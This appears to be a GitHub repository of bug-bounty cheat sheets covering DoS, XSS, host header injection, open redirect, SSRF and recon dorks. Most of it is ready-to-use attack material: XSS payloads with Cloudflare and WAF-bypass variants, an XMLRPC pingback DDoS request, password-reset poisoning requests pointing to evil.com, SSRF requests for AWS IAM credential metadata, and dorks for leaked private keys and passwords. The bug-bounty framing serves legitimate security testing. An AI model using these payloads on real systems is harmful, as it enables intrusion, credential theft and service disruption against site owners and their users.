├── Application_Level_DoS
    └── Application_Level_DoS.txt
├── Credit Card Fraud
    └── Credit Card Fraud.txt
├── Cross Site Scripting
    ├── Bypass
    └── Cross SIte Scripting.txt
├── Host Header Injection
    └── Host Header Injection.txt
├── LICENSE
├── Open Redirect
    ├── Bypass
    └── Open Redirect.txt
├── README.md
├── Recon
    ├── GitHub Dorks.txt
    └── Google Dorks.txt
└── Server Side Request Forgery
    ├── SSRF Roadmap.jpg
    └── SSRF.txt


/Application_Level_DoS/Application_Level_DoS.txt:
--------------------------------------------------------------------------------
 1 | ##BugBountyTips ##Application_Level_DoS
 2 | 
 3 |   Author : @NovanAR
 4 |   
 5 | 1. Long String DoS
 6 |     -Try to input long password when registering an account
 7 |     -Try to input long text in Address, Name, Username, etc.
 8 | 
 9 | 2. Picture Name Parameter
10 |     -Upload a picture with large value name parameter
11 |     -Upload a picture with the DoS payload inside it
12 |     -Insert a DoS payload on image's "size" parameter
13 |   
14 | 3. Pixel Flood Attack
15 |     -Try to upload a picture with large resolution image
16 |     
17 | 4. Application Level DoS via XMLRPC
18 |     1. Find some wordpress website with XMLRPC enabled and call the systems.listMethods
19 |     	
20 |         POST /xmlrpc.php HTTP/1.1
21 | 		Host: vulnerable-website.com
22 | 		Accept: /
23 | 		Accept-Language: en
24 | 		Connection: close
25 | 		Content-Length: 93
26 | 
27 | 		<methodCall>
28 | 		<methodName>system.listMethods</methodName>
29 | 		<params></params>
30 | 		</methodCall>
31 |           
32 |     2. Use the "pingback" methods to cause a DDOS attack against victim host
33 |         
34 |         POST /xmlrpc.php HTTP/1.1
35 | 		Host: vulnerable-website.com
36 | 		Accept: /
37 | 		Accept-Language: en
38 | 		Connection: close
39 | 		Content-Length: 93
40 |         
41 |           
42 |         <methodCall>
43 | 		<methodName>pingback.ping</methodName>
44 | 		<params><param>
45 | 		<value><string>http://yourip:port</string></value>
46 | 		</param><param>
47 | 		<value>
48 | 		<string>https://target.com></string>
49 | 		</value>
50 | 		</param></params>
51 | 		</methodCall>


--------------------------------------------------------------------------------
/Credit Card Fraud/Credit Card Fraud.txt:
--------------------------------------------------------------------------------
 1 | ##BugBountyTips ##Credit_Card_Fraud
 2 | 
 3 | Author : @NovanAR
 4 | GitHub : https://github.com/novanazizr
 5 | 
 6 | Found a target with an e-commerce checkout?
 7 | 
 8 | Try this test credit card number "4242 4242 4242 4242" Use any CVV and Credit Card Date
 9 | 
10 | If the payment was succeeded go report it.
11 | 
12 | The impact was Business loss, any user can checkout a product using a test credit card number
13 | 
14 | For more information check in here : https://stripe.com/docs/testing
15 | 


--------------------------------------------------------------------------------
/Cross Site Scripting/Bypass:
--------------------------------------------------------------------------------
  1 | site.com/randomsearch/?input=test reflected 
  2 | site.com/randomsearch/?input=test" reflected
  3 | site.com/randomsearch/?input=test">< reflected
  4 | site.com/randomsearch/?input=test"<h1> 403 blocked
  5 | site.com/randomsearch/?input=test"<aaaaa> 403 blocked
  6 | site.com/randomsearch/?input=test"<1> reflected
  7 | site.com/randomsearch/?input=test"<%20h1> reflected "<h1>
  8 | site.com/randomsearch/?input=test< s v g / on lo ad = con firm ( 1 )> ( popup )
  9 | <>
 10 | site.com/randomsearch/?input=test reflected 
 11 | site.com/randomsearch/?input=test" 403 blocked 
 12 | site.com/randomsearch/?input=test> 403 
 13 | site.com/randomsearch/?
 14 | via #post_data 
 15 | input=test" reflected 
 16 |   site.com/randomsearch/?
 17 | via #post_data 
 18 | ?input=test<svg/onload=confirm(1)> ( popup )
 19 | <>
 20 | site.com/randomsearch/?input=test 403
 21 | site.com/randomsearch/?input= 403
 22 | site.com/randomsearch/ 403
 23 | site.com/aandomsearch/ 404
 24 | site.com/%72andomsearch/ 403
 25 | Hello 403 
 26 | site.com/%25%37%32andomsearch/ 200  
 27 | site.com/%25%37%32andomsearch/?input=test reflected 
 28 | site.com/%25%37%32andomsearch/?input=test" 403
 29 | site.com/%25%37%32andomsearch/?
 30 | via #post_data 
 31 | ?input=test<svg/onload=confirm(1)> ( popup )
 32 | 
 33 | * KNOXSS XSS Vectors Series *
 34 | 
 35 | #XSS Vector #2
 36 | 
 37 | 1"<!--><Html%2FOnPointerEnter=%26%2397%26%23108%26%23101%26%23114%26%23116%26%2396K%26%2396<!--
 38 | 
 39 | A non-closed vector (<!--), case-agnostic payload with URL encoded HTML entities. It relies in mouse movement but with HTML tag whole document screen is available.
 40 | 
 41 | XSS BYPASS HARD CLOUDFLARE WAF SOLUTION
 42 | {` <body \< onscroll =1(=prompt,(String.fromCharCode(88,83,83,32,66,121,32,77,111,114,112,104,105,110,101)))> ´}
 43 | Input : "/**/ONX=""/**/ONFOCUS=prompt()>
 44 | Respond : Blocked 🙁
 45 | Input : "%01onfocus=test>
 46 | Respond : blocked 🙁
 47 | Input : "%2501onfocus=>
 48 | Respond : blocked 🙁
 49 | Input : "test=[1].map(confirm)>
 50 | Respond : blocked 🙁
 51 | Input : "test=[1].map%26%2300000000000040;1)>
 52 | Respond : Blocked 🙁
 53 | Solutions :
 54 | Input : "onx=() onmouseover=prompt(1)>
 55 | Respond : pop up appears 😃
 56 | Input : " onxXxxXXxXXXxx=() autofocus onmouseover=prompt(1)>
 57 | Respond : pop up appears 😃
 58 | Input : "onx={} onmouseover=prompt(1)>
 59 | Respons : pop up appears 😃
 60 | Input : "onx=[] onmouseover=prompt(1)>
 61 | Respond : pop up appears 😃
 62 | 
 63 | Dom XSS bypass WAF Cloudflare
 64 | " onfocus=0;[1].some(confirm) haha="
 65 | 
 66 | Simple technique XSS REFLECTED Bypass Waf ACCES DENIED & REQUEST REJECTED
 67 | 
 68 | Input : "onclick=> 
 69 | Respond : blocked waf :(
 70 | 
 71 | Input : "><details ontoggle=>
 72 | Respond : blocked waf :(
 73 | 
 74 | Input = "autofocus /*/onXXXXX=""/*/ONFOCUS=
 75 | Respond : blocked waf :(
 76 | 
 77 | Input : prompt()
 78 | Respond : blocked waf :(
 79 | 
 80 | Input : [1].find(alert)
 81 | Respond : blocked waf :(
 82 | 
 83 | Input : constructor.constructor('alert()')() 
 84 | Respond : blocked waf :(
 85 | 
 86 | Solutions :
 87 | 
 88 | Input : "autofocus %2501onfocus=>
 89 | Respond : not blocked waf :D
 90 | 
 91 | Input : <details/autofocus/OnToGGle=>
 92 | Respond : not blocked waf :D
 93 | 
 94 | Input : [1].map(alert)
 95 | Respond : not blocked waf :D
 96 | 
 97 | Final :
 98 | Input : <details/OPEN/autofocus/OnToGGle=[1].map(confirm)>
 99 | Respond : Pop Up appears :D
100 | 
101 | Input : "autofocus %2501onfocus=[1].map(confirm)>
102 | Respond : Pop Up appears :D
103 | 
104 | Solution XSS BYPASS REMOVED TAG & FILTER TAG HTML ENTITIES WITH NOSCRIPT TAG
105 | 
106 | Input : <img src=x onerror=prompt(1)>
107 | Respond : <img>
108 | 
109 | Input : <svg onload=prompt(1)>
110 | Respond : &lt;svg onload=prompt&#40;&#41;&gt;
111 | 
112 | Input : <details ontoggle=prompt(1)>
113 | Respond : <details xss=removed>
114 | 
115 | No pop up appears :(
116 | 
117 | Solution :
118 | 
119 | Input : <noscript><p title='</noscript><svg onload=prompt(1)>'>
120 | Respond : <noscript><p title='</noscript><svg onload=prompt&#40;1&#41;>'>
121 | 
122 | Pop up appears :D
123 | 
124 | Our 1st-choice #XSS vector reflects:
125 | 
126 | <Svg/Onload=1
127 | 
128 | We try to add code but "alert" string gets caught (403) so we split it:
129 | 
130 | top["al"+"ert"]
131 | 
132 | No 403 but 400 status code this time so we encode brackets:
133 | 
134 | <Svg/Onload=top%5B"al"%2B"ert%5D(1)//
135 | 
136 | login XSS filter bypass:
137 | 
138 | Input: "<> onmouseover="hack()
139 | 
140 | Reflection:
141 | <a class="login-link v-button" href="site.com/test"&lt;&gt; "hack()">Log in 
142 | 
143 | * <,>, on*   => Filtered
144 | * "    => Not Filtered
145 | 
146 | Bypass:
147 | ononmouseover=mouseover=onmouseover="alert()
148 | 
149 | The application will strip off the restricted word "onmouseover=" and the reflection will be:
150 | 
151 | "onmouseover="hack()
152 | or
153 | "onmouseover="prompt(document.domain)
154 | 
155 | Note: Application was only blocking eventhandlers and tags were not allowed so escaping to HTML context was not possible.
156 | 


--------------------------------------------------------------------------------
/Cross Site Scripting/Cross SIte Scripting.txt:
--------------------------------------------------------------------------------
  1 | ##BugBountyTips ##Cross_Site_Scripting
  2 | 
  3 | Author : @NovanAR
  4 | GitHub : https://github.com/novanazizr
  5 | 
  6 | Reflected XSS Tips
  7 | 
  8 | 1. Try to find any reflected page or parameters using view source code
  9 | 2. Find any hidden parameters using Arjun / FFUF
 10 | 3. Try to input this url in url parameter, example :
 11 | 	
 12 | 	https://vuln.me/url?=http://brutelogic.com.br/poc.svg
 13 | 
 14 | Stored XSS Tips
 15 | 
 16 | 1. Try to input payloads while registering on a site in fields like username, name, address, email, etc.
 17 | 2. Try in Comment section anywhere on target site.
 18 | 3. Try on every input fields which get reflected in page and which can be seen by other users.
 19 | 4. Try to signup using your name + xss payload and that can lead to stored xss.
 20 | 
 21 | Check WAF 
 22 | 
 23 | 1. https://github.com/0xInfection/Awesome-WAF
 24 | 2. https://github.com/Ekultek/WhatWaf
 25 | 3. https://github.com/EnableSecurity/wafw00f
 26 | 
 27 | Blind XSS Tips
 28 | 
 29 | 1. Common Targets for Blind XSS
 30 | 
 31 | 	- Review forms
 32 |     - Contact Us pages
 33 |     - Passwords(You never know if the other side doesn’t properly handle input and if your password is in view mode)
 34 |   	- Address fields of e-commerce sites
 35 | 	- First or Last Name field while doing Credit Card Payments
 36 | 	- Log Viewers
 37 | 	- Feedback Page
 38 | 	- Chat Applications
 39 | 	- Any app that requires user moderation
 40 |     - Customer ticket applications
 41 | 
 42 | 2. Try to input Blind XSS payloads on User-Agent header
 43 | 3. Try to input Blind XSS payloads on Referer header
 44 | 4. Try to input Blind XSS payloads on User Invitations
 45 | 
 46 | File Upload XSS Tips
 47 | 
 48 | 1. Arbitraty File Upload
 49 | 
 50 | 	- Create a file using the following code :
 51 | 
 52 | <?xml version="1.0" standalone="no"?>
 53 | <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
 54 | <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
 55 | <script type="text/javascript">
 56 | alert(document.location);
 57 | </script>
 58 | </svg>
 59 | 
 60 | 	- Save it as .SVG file, example : poc.svg
 61 |     - Upload it on any upload documents
 62 | 
 63 | 2. XSS on filename, example : "><img src=x onerror=prompt(document.domain)>.txt
 64 | 
 65 | 
 66 | XSS Firewall Bypass Techniques
 67 | 
 68 | 	Check if the firewall is blocking only lowercase
 69 | 
 70 | 		<scRipT>alert(1)</scRipT>
 71 | 
 72 | 	Try to break firewall regex with the new line(\r\n)
 73 | 
 74 | 		<script>%0alert(1)</script>
 75 | 
 76 |     Try Double Encoding
 77 | 
 78 | 		%2522
 79 | 
 80 |     Testing for recursive filters, if firewall removes text in red, we will have clear payload
 81 | 
 82 |  		<src<script>ipt>alert(1);</scr</script>ipt>
 83 | 
 84 |     Injecting anchor tag without whitespaces
 85 | 
 86 |  		<a/href="j&Tab;a&Tab;v&Tab;asc&Tab;ri&Tab;pt:alert&lpar;1&rpar;">
 87 | 
 88 |     Try to bypass whitespaces using Bullet
 89 | 
 90 | 		<svg•onload=alert(1)>
 91 | 
 92 |     Try to change request method
 93 | 
 94 | 		GET /?q=xss  POST/?q=xss
 95 | 
 96 | 	Try XSS polyglot
 97 |     	%0ajavascript:`/*\"/*-->&lt;svg onload='/*</template></noembed></noscript></style></title></textarea></script><html onmouseover="/**/ 
 98 | 
 99 | Web Function Tips
100 | 
101 | https://pastebin.com/SicF1QHx
102 | 
103 | Automated XSS Tools
104 | 
105 | 1. https://github.com/theinfosecguy/QuickXSS
106 | 2. https://github.com/hahwul/dalfox
107 | 3. https://github.com/shawarkhanethicalhacker/BruteXSS-1
108 | 


--------------------------------------------------------------------------------
/Host Header Injection/Host Header Injection.txt:
--------------------------------------------------------------------------------
 1 | ##BugBuntyTips ##Host_Header_Injection
 2 | 
 3 | 
 4 | 1. Add 2 Host :
 5 | 
 6 |  GET /api/reset-password HTTP/1.1
 7 | 		Host: vulnerable-website.com
 8 |         Host: evil.com
 9 | 		Accept: /
10 | 		Accept-Language: en
11 | 		Connection: close
12 | 		Content-Length: 98
13 |         
14 | 2. Bypass using these headers :
15 | 
16 |    X-Forwarded-Host:
17 |    X-Original-Url:
18 |    X-Forwarded-Server:
19 |    X-Host:
20 |    X-Forwarded-**Host**:
21 |    X-Rewrite-Url:
22 |    X-Originating-IP:
23 |    X-Forwarded-For:
24 |    X-Remote-IP:
25 |    X-Remote-Addr:
26 |    X-Client-IP:
27 | 
28 | 3. Try to use localhost in Host header :
29 | 	 
30 |      GET /api/reset-password HTTP/1.1
31 | 		Host: localhost
32 | 		Accept: /
33 | 		Accept-Language: en
34 | 		Connection: close
35 | 		Content-Length: 98
36 | 
37 | 4. Try to bypass it like this :
38 | 	
39 |     GET /api/reset-password HTTP/1.1
40 | 		Host: vulernable-website.com.evil.com
41 | 		Accept: /
42 | 		Accept-Language: en
43 | 		Connection: close
44 | 		Content-Length: 98
45 | 
46 | 5. Try this one :
47 | 
48 | 	Host: vulernable-website.com?.evil.com
49 |     
50 |     Source : https://lightningsecurity.io/blog/host-header-injection
51 | 
52 | 6. Also try this :
53 | 	
54 |     Host: evil.com/vulernable-website.com
55 |     
56 |     Source : https://hackerone.com/reports/317476
57 | 
58 | 7. Try to input XSS payload :
59 | 
60 | 	Host: javascript:alert(1);
61 |     
62 |     Source : https://blog.bentkowski.info/2015/04/xss-via-host-header-cse.html
63 | 
64 | 8. Use URL Poisoning :
65 | 
66 | POST /resetpass HTTP/1.1
67 | 	Host: www.vulnerable.com
68 | 	Accept: */*
69 | 	Accept-Language: en-US,en;q=0.7,id;q=0.3
70 | 	Accept-Encoding: gzip, deflate
71 | 	Content-Type: application/json
72 | 	Content-Length: 165
73 | 	Connection: close
74 | 
75 | 
76 | {"requestType":"PASSWORD_RESET","continueUrl":"http://evil.com"}
77 | 
78 | Response :
79 | https://www.vulnerable.com?mode=resetPassword&code=ABC123&continueUrl=http://evil.com


--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
 1 | MIT License
 2 | 
 3 | Copyright (c) 2021 novanazizr
 4 | 
 5 | Permission is hereby granted, free of charge, to any person obtaining a copy
 6 | of this software and associated documentation files (the "Software"), to deal
 7 | in the Software without restriction, including without limitation the rights
 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 | 
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 | 
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 | 


--------------------------------------------------------------------------------
/Open Redirect/Bypass:
--------------------------------------------------------------------------------
 1 | Chain open redirect with XSS
 2 | 
 3 | Basic
 4 | https://site.com/?redirect=javascript:alert(1)
 5 | 
 6 | Not working? Bypass it
 7 | https://site.com/?redirect=javascript://%250Aalert(1)
 8 | 
 9 | Not working again? Bypass again
10 | https://site.com/?redirect=JavaScript://%250Dtop.confirm(1)//?1
11 | 


--------------------------------------------------------------------------------
/Open Redirect/Open Redirect.txt:
--------------------------------------------------------------------------------
 1 | ##BugBountyTips ##OpenRedirect
 2 | 
 3 | Author : @NovanAR
 4 | GitHub : https://github.com/novanazizr
 5 |   
 6 | How to find open redirect?
 7 |   
 8 |   1. If the Applictaion have a user Sign-In/Sign-Up feature, then register a user and log in as the user.
 9 |   
10 |   2. Go to your user profile page , for example : example.com/accounts/profile
11 |   
12 |   3. Copy the profile page's URL
13 |   
14 |   4. Logout and Clear all the cookies and go to the homepage of the site.
15 |   
16 |   5. Paste the Copied Profile URL on the address bar 
17 |   
18 |   6. If the site prompts for a login , check the address bar , you may find the login page with a redirect parameter like the following
19 |         
20 |     	- https://vuln.me/login?next=/accounts/profile
21 |         - https://vuln.me/login?returnUrl=/accounts/profile
22 |     
23 | How to bypass it?
24 |     
25 |   1. https://vuln.me/login?next=https://vuln.me@evil.com ( due to bad regex )
26 |   2. https://vuln.me/login?next=http://evil%E3%80%82com (  By using the character 。 (%E3%80%82 url encoded) instead of a normal dot in urls, it is possible to bypass the blocking. )
27 |     
28 |     
29 | Try to leverage it to XSS
30 |     
31 |    - https://vuln.me/login?next=javascript:alert(1);//
32 |     
33 |     
34 | Recommended open redirect bypass tool
35 |     
36 |   - https://github.com/adelittle/aincurl
37 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # BugBountyHunting
2 | Some Tutorials and Things to Help Bug Hunter
3 | 
4 | 
5 | Support me : <br><br>
6 | <a href="https://paypal.me/novanazizramadhan"><img src="https://postanythingwebsite.files.wordpress.com/2019/03/paypal-logo.png" width="500px" height="200px">
7 | 


--------------------------------------------------------------------------------
/Recon/GitHub Dorks.txt:
--------------------------------------------------------------------------------
 1 | filename:manifest.xml
 2 | filename:travis.yml
 3 | filename:vim_settings.xml
 4 | filename:database
 5 | filename:prod.exs NOT prod.secret.exs
 6 | filename:prod.secret.exs
 7 | filename:.npmrc _auth
 8 | filename:.dockercfg auth
 9 | filename:WebServers.xml
10 | filename:.bash_history
11 | filename:sftp-config.json
12 | filename:sftp.json path:.vscode
13 | filename:secrets.yml password
14 | filename:.esmtprc password
15 | filename:passwd path:etc
16 | filename:dbeaver-data-sources.xml
17 | path:sites databases password
18 | filename:config.php dbpasswd
19 | filename:prod.secret.exs
20 | filename:configuration.php JConfig password
21 | filename:.sh_history
22 | shodan_api_key language:python
23 | filename:shadow path:etc
24 | JEKYLL_GITHUB_TOKEN
25 | filename:proftpdpasswd
26 | filename:.pgpass
27 | filename:idea14.key
28 | filename:hub oauth_token
29 | HEROKU_API_KEY language:json
30 | HEROKU_API_KEY language:shell
31 | SF_USERNAME salesforce
32 | filename:.bash_profile aws
33 | extension:json api.forecast.io
34 | filename:.env MAIL_HOST=smtp.gmail.com
35 | filename:wp-config.php
36 | extension:sql mysql dump
37 | filename:credentials aws_access_key_id
38 | filename:id_rsa or filename:id_dsa
39 | 
40 | GitHub Dorks for Finding Languages
41 | 
42 | language:python username
43 | language:php username
44 | language:sql username
45 | language:html password
46 | language:perl password
47 | language:shell username
48 | language:java api
49 | HOMEBREW_GITHUB_API_TOKEN language:shell
50 | 
51 | GiHub Dorks for Finding API Keys, Tokens and Passwords
52 | 
53 | api_key
54 | “api keys”
55 | authorization_bearer:
56 | oauth
57 | auth
58 | authentication
59 | client_secret
60 | api_token:
61 | “api token”
62 | client_id
63 | password
64 | user_password
65 | user_pass
66 | passcode
67 | client_secret
68 | secret
69 | password hash
70 | OTP
71 | user auth
72 | 
73 | 


--------------------------------------------------------------------------------
/Recon/Google Dorks.txt:
--------------------------------------------------------------------------------
 1 | "-----BEGIN EC PRIVATE KEY-----" | " -----BEGIN EC PARAMETERS-----" ext:pem | ext:key | ext:txt
 2 | inurl:example.com intitle:"index of"
 3 | inurl:example.com intitle:"index of /" "*key.pem"
 4 | inurl:example.com ext:log
 5 | inurl:example.com intitle:"index of" ext:sql|xls|xml|json|csv
 6 | inurl:example.com "MYSQL_ROOT_PASSWORD:" ext:env OR ext:yml -git
 7 | inurl:example.com intitle:"index of" "config.db"
 8 | inurl:example.com allintext:"API_SECRET*" ext:env | ext:yml
 9 | inurl:example.com intext:admin ext:sql inurl:admin
10 | inurl:example.com allintext:username,password filetype:log
11 | site:example.com "-----BEGIN RSA PRIVATE KEY-----" inurl:id_rsa
12 | DB_USERNAME filetype:env
13 | DB_PASSWORD filetype:enc=v
14 | filetype:txt site:web.com password|passwords|contraseñas|login|contraseña
15 | filetype:sql “MySQL dump” (pass|password|passwd|pwd)
16 | site:gov filetype:pdf allintitle:restricted
17 | allintext:password filetype:log after:2020
18 | intitle:"index of" inurl:ftp
19 | intitle:"index of" inurl:http after:2020
20 | filetype:xls inurl:"email.xls"
21 | intitle:index.of id_rsa -id_rsa.pub
22 | filetype:log username putty  


--------------------------------------------------------------------------------
/Server Side Request Forgery/SSRF Roadmap.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/novanazizr/BugBountyHunting/24144fada114ff0cb116b8387059a460ed30e68b/Server Side Request Forgery/SSRF Roadmap.jpg


--------------------------------------------------------------------------------
/Server Side Request Forgery/SSRF.txt:
--------------------------------------------------------------------------------
 1 | ##BugBountyTips ##ServerSideRequestForgery
 2 | 
 3 | Author : @NovanAR
 4 | GitHub : https://github.com/novanazizr
 5 |   
 6 |   
 7 | ##Full Description About SSRF
 8 |   
 9 |   https://www.hackerone.com/blog-How-To-Server-Side-Request-Forgery-SSRF
10 |   
11 | ##How To Find SSRF?
12 |  
13 | 1. If you got Open Redirect try escalating it to SSRF.
14 | 2. gf SSRF to grep parameters may vulnerable to SSRF.
15 | 3. SSRF's are more in API's so crawl the whole web app with burp proxy turned on and search for keywords like., eg :
16 | 
17 | 		?url=
18 | 		?uri=
19 | 		?req= 
20 |         
21 | 4. Sign up with an Email like attacker.collaborator.net. If u receive HTTP req. in collaborator then its SSRF. But if there's no impact don't report it, DNS and SMTP request doesn't matters.
22 | 
23 |   
24 | ##AWS Metadata
25 | 
26 | 1. AWS localhost is 169.254.169.254 so don't use 127.0.0.1 there!
27 | 2. If you found an SSRF vulnerability that runs on EC2, try requesting :
28 | 
29 |    	http://169.254.169.254/latest/meta-data/
30 | 	http://169.254.169.254/latest/user-data/
31 | 	http://169.254.169.254/latest/meta-data/iam/security-credentials/IAM_USER_ROLE_HERE
32 | 	http://169.254.169.254/latest/meta-data/iam/security-credentials/flaws/
33 |       
34 |       Source : https://twitter.com/ADITYASHENDE17/status/1305051512335298562
35 |  
36 | ##Escalation
37 |   
38 | 1. Try to escalate it to RCE using AWS Metadata
39 |    
40 |         Source : https://hackerone.com/reports/341876
41 | 
42 | 2. Try to escalate it to OS Command Injection using collaborator
43 |           
44 |           <os cmd>.collaborator.net
45 |         
46 |         Source : https://www.youtube.com/watch?v=apzJiaQ6a3k
47 |           
48 | 3. Try to escalate it to XSS using SVG image
49 |           
50 |         Source : https://hackerone.com/reports/223203
51 | 
52 | 
53 | ##Blind SSRF Tips
54 | 
55 | 1. Try to find Blind SSRF on hidden parameter
56 | 2. Try Blind SSRF on referer header
57 |           
58 | One way of finding them is by inserting your burp collaborator domain into the referrer header also known as host header injection.
59 | 
60 | Snippet:
61 | 
62 |     GET /HTTP 1.1
63 |     Host: site.com
64 |     User Agent: Firefox
65 |     Referrer: https://your_collaborator_instance.com
66 | 
67 | ##SSRF Bypass
68 |       
69 | 1. http://[0:0:0:0:0:ffff:127.0.0.1]/(the file)
70 |         
71 |   		Source : https://hackerone.com/reports/736867
72 | 
73 | 2. Using %E3%80%82 (。) Url Encode
74 |           
75 |         Source : https://twitter.com/h4x0r_dz/status/1335880542353559552


--------------------------------------------------------------------------------